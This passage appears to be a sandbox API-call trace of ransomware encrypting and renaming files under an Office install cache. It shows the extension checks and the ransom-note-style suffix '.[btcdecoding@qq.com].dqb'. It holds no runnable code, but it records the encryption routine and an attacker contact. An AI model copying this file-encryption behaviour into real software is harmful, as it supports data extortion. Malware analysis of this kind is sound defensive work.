| out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0045.375] SetEndOfFile (hFile=0x174) returned 1 [0045.375] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fc24e0 [0045.375] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.375] WriteFile (in: hFile=0x174, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.376] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.376] WriteFile (in: hFile=0x174, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.378] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.378] WriteFile (in: hFile=0x174, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.380] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fc24e0 | out: hHeap=0x570000) returned 1 [0045.380] CloseHandle (hObject=0x174) returned 1 [0045.380] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.380] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.380] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.380] lstrlenW (lpString=".doc") returned 4 [0045.380] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0045.380] lstrlenW (lpString=".docx") returned 5 [0045.380] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0045.380] lstrlenW (lpString=".pdf") returned 4 [0045.380] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0045.380] lstrlenW (lpString=".xls") returned 4 [0045.380] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0045.380] lstrlenW (lpString=".xlsx") returned 5 [0045.380] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0045.380] lstrlenW (lpString=".ppt") returned 4 [0045.381] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.381] lstrlenW (lpString=".zip") returned 4 [0045.381] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString=".rar") returned 4 [0045.381] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString=".bz2") returned 4 [0045.381] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0045.381] lstrlenW (lpString=".7z") returned 3 [0045.381] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.381] lstrlenW (lpString=".dbf") returned 4 [0045.381] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.381] lstrlenW (lpString=".1cd") returned 4 [0045.381] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.381] lstrlenW (lpString=".jpg") returned 4 [0045.381] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.381] lstrlenW (lpString=".doc") returned 4 [0045.381] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString=".docx") returned 5 [0045.381] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0045.381] lstrlenW (lpString=".pdf") returned 4 [0045.381] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString=".xls") returned 4 [0045.381] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString=".xlsx") returned 5 [0045.381] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0045.381] lstrlenW (lpString=".ppt") returned 4 [0045.381] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0045.381] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.382] lstrlenW (lpString=".zip") returned 4 [0045.382] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0045.382] lstrlenW (lpString=".rar") returned 4 [0045.382] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0045.382] lstrlenW (lpString=".bz2") returned 4 [0045.382] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0045.382] lstrlenW (lpString=".7z") returned 3 [0045.382] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0045.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.382] lstrlenW (lpString=".dbf") returned 4 [0045.382] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0045.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.382] lstrlenW (lpString=".1cd") returned 4 [0045.382] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0045.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0045.382] lstrlenW (lpString=".jpg") returned 4 [0045.382] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.382] lstrcmpiW (lpString1=".xrm-ms", lpString2=".dqb") returned 1 [0045.382] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0045.382] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.382] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=715834) returned 1 [0045.382] CloseHandle (hObject=0x174) returned 1 [0045.382] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0045.383] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.383] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.383] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.383] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.383] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0045.383] GetLastError () returned 0x0 [0045.383] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0045.535] WriteFile (in: hFile=0x224, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0045.549] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.549] WriteFile (in: hFile=0x224, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x104, lpOverlapped=0x0) returned 1 [0045.549] SetEndOfFile (hFile=0x224) returned 1 [0045.549] CloseHandle (hObject=0x224) returned 1 [0045.550] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.550] SetEndOfFile (hFile=0x174) returned 1 [0045.555] CloseHandle (hObject=0x174) returned 1 [0045.555] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.555] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0045.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.556] lstrlenW (lpString=".doc") returned 4 [0045.556] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString=".docx") returned 5 [0045.556] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0045.556] lstrlenW (lpString=".pdf") returned 4 [0045.556] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString=".xls") returned 4 [0045.556] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString=".xlsx") returned 5 [0045.556] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0045.556] lstrlenW (lpString=".ppt") returned 4 [0045.556] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.556] lstrlenW (lpString=".zip") returned 4 [0045.556] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString=".rar") returned 4 [0045.556] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString=".bz2") returned 4 [0045.556] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString=".7z") returned 3 [0045.556] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0045.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.556] lstrlenW (lpString=".dbf") returned 4 [0045.556] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0045.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.556] lstrlenW (lpString=".1cd") returned 4 [0045.556] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.557] lstrlenW (lpString=".jpg") returned 4 [0045.557] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.557] lstrlenW (lpString=".doc") returned 4 [0045.557] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString=".docx") returned 5 [0045.557] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0045.557] lstrlenW (lpString=".pdf") returned 4 [0045.557] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString=".xls") returned 4 [0045.557] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString=".xlsx") returned 5 [0045.557] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0045.557] lstrlenW (lpString=".ppt") returned 4 [0045.557] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.557] lstrlenW (lpString=".zip") returned 4 [0045.557] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString=".rar") returned 4 [0045.557] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString=".bz2") returned 4 [0045.557] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString=".7z") returned 3 [0045.557] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.557] lstrlenW (lpString=".dbf") returned 4 [0045.557] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.557] lstrlenW (lpString=".1cd") returned 4 [0045.557] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0045.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.558] lstrlenW (lpString=".jpg") returned 4 [0045.558] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0045.558] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0045.558] lstrlenW (lpString="ProPlusrWW.msi") returned 14 [0045.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.558] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=27532288) returned 1 [0045.558] CloseHandle (hObject=0x174) returned 1 [0045.558] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020 [0045.558] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.558] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0045.559] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.559] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.559] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.559] ReadFile (in: hFile=0x174, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.746] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.746] ReadFile (in: hFile=0x174, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.754] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.754] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.755] ReadFile (in: hFile=0x174, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.770] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.770] WriteFile (in: hFile=0x174, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0045.787] SetEndOfFile (hFile=0x174) returned 1 [0045.787] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0045.787] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.787] WriteFile (in: hFile=0x174, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.788] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.788] WriteFile (in: hFile=0x174, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.791] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.791] WriteFile (in: hFile=0x174, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.793] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0045.793] CloseHandle (hObject=0x174) returned 1 [0045.793] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.793] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.793] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.793] lstrlenW (lpString=".doc") returned 4 [0045.793] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.793] lstrlenW (lpString=".docx") returned 5 [0045.793] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0045.794] lstrlenW (lpString=".pdf") returned 4 [0045.794] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.794] lstrlenW (lpString=".xls") returned 4 [0045.794] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.794] lstrlenW (lpString=".xlsx") returned 5 [0045.794] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0045.794] lstrlenW (lpString=".ppt") returned 4 [0045.794] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.794] lstrlenW (lpString=".zip") returned 4 [0045.794] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.794] lstrlenW (lpString=".rar") returned 4 [0046.014] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.014] lstrlenW (lpString=".bz2") returned 4 [0046.014] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.014] lstrlenW (lpString=".7z") returned 3 [0046.015] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString=".dbf") returned 4 [0046.015] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString=".1cd") returned 4 [0046.015] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString=".jpg") returned 4 [0046.015] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString=".doc") returned 4 [0046.015] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.015] lstrlenW (lpString=".docx") returned 5 [0046.015] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0046.015] lstrlenW (lpString=".pdf") returned 4 [0046.015] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.015] lstrlenW (lpString=".xls") returned 4 [0046.015] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.015] lstrlenW (lpString=".xlsx") returned 5 [0046.015] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0046.015] lstrlenW (lpString=".ppt") returned 4 [0046.015] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString=".zip") returned 4 [0046.015] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.015] lstrlenW (lpString=".rar") returned 4 [0046.015] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.015] lstrlenW (lpString=".bz2") returned 4 [0046.015] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.015] lstrlenW (lpString=".7z") returned 3 [0046.015] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.015] lstrlenW (lpString=".dbf") returned 4 [0046.015] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.016] lstrlenW (lpString=".1cd") returned 4 [0046.016] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.016] lstrlenW (lpString="C:\\MSOCache\\All 